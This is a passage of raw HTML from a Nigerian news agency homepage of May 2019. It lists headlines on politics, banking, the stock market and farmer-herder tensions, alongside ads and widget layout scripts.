rel="bookmark" title="Herdsmen presence scare farmers in Abia" target="_self" href="https://www.nan.ng/agriculture/herdsmen-presence-scare-farmers-in-abia/">Herdsmen presence scare farmers in Abia</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:45:53+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:45:53+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2016/08/Fulani-herdsmen1-270x180.jpg"> </div> </div> </div> </li> <li class="post-124192 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-9th-assembly-speakership tag-emeka-nwajiuba tag-house-of-representatives" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba" target="_self" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/">Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:38:11+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:38:11+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg"> </div> </div> </div> </li> <li class="post-124193 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-inflation-rate tag-lcci" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Chamber advises FG on ways to reduce inflation" target="_self" href="https://www.nan.ng/news/chamber-advises-fg-on-ways-to-reduce-inflation/">Chamber advises FG on ways to reduce inflation</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:31:55+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:31:55+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2016/10/Muda-Yusuf_director-general-Lagos-Chamber-of-Commerce-and-Industry-s-526x330-270x180.jpg"> </div> </div> </div> </li> <li class="post-124191 post type-post status-publish format-standard has-post-thumbnail hentry category-banking tag-cbn-governor-godwin-emefiele" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Senate confirms Emefiele’s reappointment as CBN Governor" target="_self" href="https://www.nan.ng/banking/senate-confirms-emefieles-reappointment-as-cbn-governor/">Senate confirms Emefiele’s reappointment as CBN Governor</a> </h5> <meta itemprop="datePublished" content="2019-05-16T14:18:53+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:18:53+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/01/Godwin-Emefiele-on-twitter-handle-My-hands-are-clean-270x180.jpg"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div><div class="vc_row wpb_row vc_custom_1532352528767 in-container"> <div class="vc_col-sm-12 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.nan.ng/we-host-your-events-and-put-your-mind-at-rest/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="1080" height="250" src="https://s18694.pcdn.co/wp-content/uploads/2018/07/NAN_MEDIA_CENTER2.jpg" class="vc_single_image-img attachment-full" alt="" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/07/NAN_MEDIA_CENTER2.jpg 1080w, https://s18694.pcdn.co/wp-content/uploads/2018/07/NAN_MEDIA_CENTER2-300x69.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2018/07/NAN_MEDIA_CENTER2-768x178.jpg 768w, https://s18694.pcdn.co/wp-content/uploads/2018/07/NAN_MEDIA_CENTER2-1024x237.jpg 1024w" sizes="(max-width: 1080px) 100vw, 1080px" /></a> </figure> </div> </div> </div> </div><div class="vc_row wpb_row vc_custom_1475176837698 in-container"> <div class="vc_col-sm-8 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_row wpb_row vc_inner in-container"> <div class="vc_col-sm-6 wpb_column vc_column_container vc_custom_1472994045041"> <div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html vc_custom_1473519238393" > <div class="wpb_wrapper"> <div style="width: 100%; background: #EDEDED; padding: 5px 10px 0;"><h4>Business</h4></div> </div> </div> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget2e5b78c3217684d8423a4c1fcfcad1a2_style" class="widget-instance-style" scoped> #xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title,#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title:not(.bold),#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title:not(.bold) > a{font-weight:600;}#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-excerpt{font-size:14px;line-height:18px;font-weight:400;}@media only screen and (max-width:849px){#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title,#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidget2e5b78c3217684d8423a4c1fcfcad1a2 .xt-post-excerpt{font-size:14px!important;}} </style><div id="xtwidget2e5b78c3217684d8423a4c1fcfcad1a2" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col meta-category-stats-over meta-options xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/business/bears-persist-on-nse/'" style="height:180px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/business/bears-persist-on-nse/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="NSE" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE.jpg 275w" sizes="(max-width: 270px) 100vw, 270px" /> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Bears persist on NSE" target="_self" href="https://www.nan.ng/business/bears-persist-on-nse/">Bears persist on NSE</a> </h4> <meta itemprop="datePublished" content="2019-05-15T18:18:54+01:00"> <meta itemprop="dateModified" content="2019-05-15T18:18:54+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="MSMEs : BoI bags best Development Bank Award" target="_self" href="https://www.nan.ng/business/msmes-boi-bags-best-development-bank-award/">MSMEs : BoI bags best Development Bank Award</a> </h4> <meta itemprop="datePublished" content="2019-05-14T19:27:32+01:00"> <meta itemprop="dateModified" content="2019-05-14T19:27:32+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2016/10/small-business-1-270x180.jpe"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="NSE: Market indices down by 0.22%" target="_self" href="https://www.nan.ng/business/nse-market-indices-down-by-0-22/">NSE: Market indices down by 0.22%</a> </h4> <meta itemprop="datePublished" content="2019-05-14T19:14:27+01:00"> <meta itemprop="dateModified" content="2019-05-14T19:14:27+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/03/NSE-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="FG concessions N1.56b medical warehouse facilities" target="_self" href="https://www.nan.ng/health/fg-concessions-n1-56b-medical-warehouse-facilities/">FG concessions N1.56b medical warehouse facilities</a> </h4> <meta itemprop="datePublished" content="2019-05-14T17:29:58+01:00"> <meta itemprop="dateModified" content="2019-05-14T17:29:58+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/MWF-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="US targets $300bn Chinese goods for new tariff hikes" target="_self" href="https://www.nan.ng/business/us-targets-300bn-chinese-goods-for-new-tariff-hikes/">US targets $300bn Chinese goods for new tariff hikes</a> </h4> <meta itemprop="datePublished" content="2019-05-14T09:42:09+01:00"> <meta itemprop="dateModified" content="2019-05-14T09:42:09+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2017/04/U.S.-and-China-United-against-North-Korea-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> <div class="vc_col-sm-6 wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html vc_custom_1473515266252" > <div class="wpb_wrapper"> <div style="width: 100%; background: #EDEDED; padding: 5px 10px 0;"><h4>Politics</h4></div> </div> </div> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgete99d60bb195a301d36fc66af94628922_style" class="widget-instance-style" scoped> #xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title,#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title:not(.bold),#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title:not(.bold) > a{font-weight:600;}#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-excerpt{font-size:14px;line-height:18px;font-weight:400;}@media only screen and (max-width:849px){#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title,#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgete99d60bb195a301d36fc66af94628922 .xt-post-excerpt{font-size:14px!important;}} </style><div id="xtwidgete99d60bb195a301d36fc66af94628922" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col meta-category-stats-over meta-options xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/'" style="height:180px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="Nigeria&#039;s House of Reps" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba" target="_self" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/">Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba</a> </h4> <meta itemprop="datePublished" content="2019-05-16T14:38:11+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:38:11+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba" target="_self" href="https://www.nan.ng/news/obasanjo-demystified-by-buharis-victory-lagos-oba/">Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba</a> </h4> <meta itemprop="datePublished" content="2019-05-15T22:53:29+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:53:29+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="NASS inaugurates New Media Forum, Yemi Itodo as President" target="_self" href="https://www.nan.ng/news/nass-inaugurates-new-media-forum/">NASS inaugurates New Media Forum, Yemi Itodo as President</a> </h4> <meta itemprop="datePublished" content="2019-05-15T22:31:25+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:31:25+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Another Nigerian Victoria Obaze becomes Mayor in UK" target="_self" href="https://www.nan.ng/news/another-nigerian-victoria-obaze-becomes-mayor-in-uk/">Another Nigerian Victoria Obaze becomes Mayor in UK</a> </h4> <meta itemprop="datePublished" content="2019-05-15T21:12:39+01:00"> <meta itemprop="dateModified" content="2019-05-15T21:12:39+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Gov. Al-Makura sacks political appointees May 29" target="_self" href="https://www.nan.ng/news/gov-al-makura-sacks-political-appointees-may-29/">Gov. Al-Makura sacks political appointees May 29</a> </h4> <meta itemprop="datePublished" content="2019-05-15T17:24:44+01:00"> <meta itemprop="dateModified" content="2019-05-15T17:24:44+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/11/Governor-Tanko-Al-Makura-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> </div><div class="vc_row wpb_row vc_inner vc_custom_1473528313917 in-container"> <div class="vc_col-sm-12 wpb_column vc_column_container vc_custom_1473528412398"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetd5d37a277f5be72b90bf4bc88d842483_style" class="widget-instance-style" scoped> #xtwidgetd5d37a277f5be72b90bf4bc88d842483 .xt-post-title,#xtwidgetd5d37a277f5be72b90bf4bc88d842483 .xt-post-title > a{font-size:36px;line-height:40px;}@media only screen and (max-width:849px){#xtwidgetd5d37a277f5be72b90bf4bc88d842483 .xt-post-title,#xtwidgetd5d37a277f5be72b90bf4bc88d842483 .xt-post-title > a{font-size:30.6px!important;line-height:1.3!important;}} </style><div id="xtwidgetd5d37a277f5be72b90bf4bc88d842483" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix has-pagination"><div class="xt-spinner-wrap prev-next"> <div class="xt-spinner prev-next sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div><nav class="xt-news-pagination navigation paging-navigation type-prev-next top-right right" data-type="prev-next" data-position="top-right" data-animation="_fade" data-animationdir="left-right" data-instance="xtwidgetd5d37a277f5be72b90bf4bc88d842483"><div class="pagination loop-pagination"><a data-page="1" data-direction="previous" href="#" class="page-disabled page-numbers previous-page"><span class="fa fa-angle-left"></span> Prev</a><a data-page="2" data-direction="next" href="#" class="page-numbers next-page">Next <span class="fa fa-angle-right"></span></a></div></nav> <script id="script_xtwidgetd5d37a277f5be72b90bf4bc88d842483" class="widget-instance-script"> var xtwidgetd5d37a277f5be72b90bf4bc88d842483 = {title: "",action_title: "",action_obj_id: "",action_ext_link: "",css_animation: "",query_type: "most-recent",date_range: "",custom_query: "",selection: "",include_posts: "",related_to: "",related_to_type: "categories",category: "",exclude_category: "",query_post_formats: "yes",number: "1",offset: "",pagination: "prev-next",pagination_position: "top-right",pagination_arrows_only: "",pagination_show_current: "",pagination_animation: "_fade",pagination_animation_direction: "left-right",pagination_max_pages: "5",pagination_infinite_max_pages: "",page: "",format: "post-format-gallery",view: "grid|col:1",grid_gutter: "",meta_options: "meta-all-over",meta_over_padding: "",show_title_on_hover: "",show_excerpt_on_hover: "",show_category_on_hover: "",image_height_type: "",image_height: "",columns_width: "",columns_posts_count: "",slider_height: "",thumbnails_size: "custom",featured_thumbnails_size: "",custom_thumbnails_size_w: "",custom_thumbnails_size_h: "400",custom_featured_thumbnails_size_w: "",custom_featured_thumbnails_size_h: "",thumbnails_filter: "",embed_video: "",show_excerpt: "",show_excerpt_only_featured: "",show_date: "",show_date_only_featured: "",datetime_ago: "",show_author: "",show_author_only_featured: "",show_stats: "",show_stats_only_featured: "",show_category: "",show_category_only_featured: "",max_categories: "",title_length: "",title_font_size: "36",title_font_weight: "",title_line_height: "40",title_margin_bottom: "",excerpt_length: "30",excerpt_font_size: "",excerpt_font_weight: "",excerpt_line_height: "",excerpt_margin_bottom: "",featured_title_length: "",featured_title_font_size: "",featured_title_font_weight: "",featured_title_line_height: "",featured_title_margin_bottom: "",featured_excerpt_length: "55",featured_excerpt_font_size: "",featured_excerpt_font_weight: "",featured_excerpt_line_height: "",featured_excerpt_margin_bottom: ""}; </script></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-all-over meta-options medium-block-grid-1 large-block-grid-1" > <li class="post-124105 post type-post status-publish format-gallery has-post-thumbnail hentry category-news category-photo-news tag-nass-leaders tag-president-buhari tag-senator-bukola-saraki post_format-post-format-gallery" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background " onclick="location.href='https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/'" style=" background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--e1557867036154-599x400.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/"> <img itemprop="image" alt="Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--e1557867036154-599x400.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--e1557867036154-599x400.jpg" width="599" height="400" class="wp-post-image wp-featured-image"> </a> <div class="icon-overlay"><span class="fa fa fa-camera-retro"></span></div> </div> <div class="medium-12 in_widget column meta-container gradient-wrap"> <div class="meta row in-container"> <h3 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Buhari breaks fast with Saraki, Dogara, NASS leaders" target="_self" href="https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/">Buhari breaks fast with Saraki, Dogara, NASS leaders</a> </h3> <meta itemprop="datePublished" content="2019-05-14T21:57:45+01:00"> <meta itemprop="dateModified" content="2019-05-14T22:50:55+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div> </div> </div> <div class="vc_col-sm-4 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container vc_custom_1473506340713 has-sticky-sidebar" data-margin_top="10" data-margin_bottom="0" > <div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_left"> <figure class="wpb_wrapper vc_figure"> <a href="https://vitafoamng.com/store/" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="252" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/vitafoam_advert.gif" class="vc_single_image-img attachment-full" alt="" /></a> </figure> </div> <div class="wpb_single_image wpb_content_element vc_align_left"> <figure class="wpb_wrapper vc_figure"> <a href="https://s18694.pcdn.co/wp-content/uploads/2019/03/NNPC-financial-reports-December-2018.pdf" target="_blank" class="vc_single_image-wrapper vc_box_border_grey"><img class="vc_single_image-img " src="https://s18694.pcdn.co/wp-content/uploads/2019/03/NNPC-financial-reports-DEC-2018-banner-300.png" width="300" height="169" alt="NNPC-financial-reports-DEC-2018-banner-300" title="NNPC-financial-reports-DEC-2018-banner-300" /></a> </figure> </div> <div class="wpb_single_image wpb_content_element vc_align_left"> <figure class="wpb_wrapper vc_figure"> <a href="https://www.nan.ng/sponsored/nlngs-commitment-nigeria-far-beyond-gas/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="242" src="https://s18694.pcdn.co/wp-content/uploads/2018/01/NLNG-Committment-to-Nigeria-NAN-300-banner-2018.jpg" class="vc_single_image-img attachment-full" alt="" /></a> </figure> </div> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget7f3d155a040ebf738573ae7e19bc4be7_style" class="widget-instance-style" scoped> #xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title,#xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title:not(.bold),#xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title:not(.bold) > a{font-weight:600;}@media only screen and (max-width:849px){#xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title,#xtwidget7f3d155a040ebf738573ae7e19bc4be7 .xt-post-title > a{font-size:15px!important;}} </style><div id="xtwidget7f3d155a040ebf738573ae7e19bc4be7" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix has-pagination"><div class="xt-spinner-wrap prev-next"> <div class="xt-spinner prev-next sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div><nav class="xt-news-pagination navigation paging-navigation type-prev-next top-right right" data-type="prev-next" data-position="top-right" data-animation="_fade" data-animationdir="left-right" data-instance="xtwidget7f3d155a040ebf738573ae7e19bc4be7"><div class="pagination loop-pagination"><a data-page="1" data-direction="previous" href="#" class="page-disabled page-numbers previous-page"><span class="no-margin fa fa-angle-left"></span></a><a data-page="1" data-direction="current" class="page-numbers current-page" href="#">1</a><a data-page="2" data-direction="next" href="#" class="page-numbers next-page"><span class="no-margin fa fa-angle-right"></span></a></div></nav> <script id="script_xtwidget7f3d155a040ebf738573ae7e19bc4be7" class="widget-instance-script"> var xtwidget7f3d155a040ebf738573ae7e19bc4be7 = {title: "Most Read",action_title: "",action_obj_id: "",action_ext_link: "",css_animation: "",query_type: "most-viewed",date_range: "24 hours ago",custom_query: "",selection: "",include_posts: "",related_to: "",related_to_type: "categories",category: "",exclude_category: "",query_post_formats: "",number: "4",offset: "",pagination: "prev-next",pagination_position: "top-right",pagination_arrows_only: "yes",pagination_show_current: "yes",pagination_animation: "_fade",pagination_animation_direction: "left-right",pagination_max_pages: "",pagination_infinite_max_pages: "",page: "",format: "",view: "ranking-thumbs",grid_gutter: "",meta_options: "",meta_over_padding: "",show_title_on_hover: "",show_excerpt_on_hover: "",show_category_on_hover: "",image_height_type: "",image_height: "",columns_width: "",columns_posts_count: "",slider_height: "",thumbnails_size: "",featured_thumbnails_size: "",custom_thumbnails_size_w: "",custom_thumbnails_size_h: "",custom_featured_thumbnails_size_w: "",custom_featured_thumbnails_size_h: "",thumbnails_filter: "",embed_video: "",show_excerpt: "",show_excerpt_only_featured: "",show_date: "",show_date_only_featured: "",datetime_ago: "",show_author: "",show_author_only_featured: "",show_stats: "",show_stats_only_featured: "",show_category: "1",show_category_only_featured: "",max_categories: "",title_length: "",title_font_size: "15",title_font_weight: "600",title_line_height: "19",title_margin_bottom: "",excerpt_length: "30",excerpt_font_size: "",excerpt_font_weight: "",excerpt_line_height: "",excerpt_margin_bottom: "",featured_title_length: "",featured_title_font_size: "",featured_title_font_weight: "",featured_title_line_height: "",featured_title_margin_bottom: "",featured_excerpt_length: "55",featured_excerpt_font_size: "",featured_excerpt_font_weight: "",featured_excerpt_line_height: "",featured_excerpt_margin_bottom: ""}; </script><h3 class="widgettitle">Most Read </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list numeric-list xt-ajax-wrap list" > <li class=" show-thumbs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 medium-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/another-nigerian-victoria-obaze-becomes-mayor-in-uk/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Councillor Victoria Obaze, now Mayor of London Borough of Tower Hamlets" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-480x320.jpg 480w" sizes="(max-width: 165px) 100vw, 165px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="small-12 medium-8 column last"> <div class="meta default-meta side"> <span class="category xt-post-category"> <a href="https://www.nan.ng/news/" title="View all posts in News"><span itemprop="articleSection">News</span></a> </span> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Another Nigerian Victoria Obaze becomes Mayor in UK" target="_self" href="https://www.nan.ng/news/another-nigerian-victoria-obaze-becomes-mayor-in-uk/">Another Nigerian Victoria Obaze becomes Mayor in UK</a> </h5> <meta itemprop="datePublished" content="2019-05-15T21:12:39+01:00"> <meta itemprop="dateModified" content="2019-05-15T21:12:39+01:00"> </div> </div> </li> <li class=" show-thumbs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 medium-4 column first"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/"> <img width="165" height="110" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-165x110.jpg" class="attachment-xt-small wp-post-image" alt="Atiku in Rivers" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-300x201.jpg 300w, 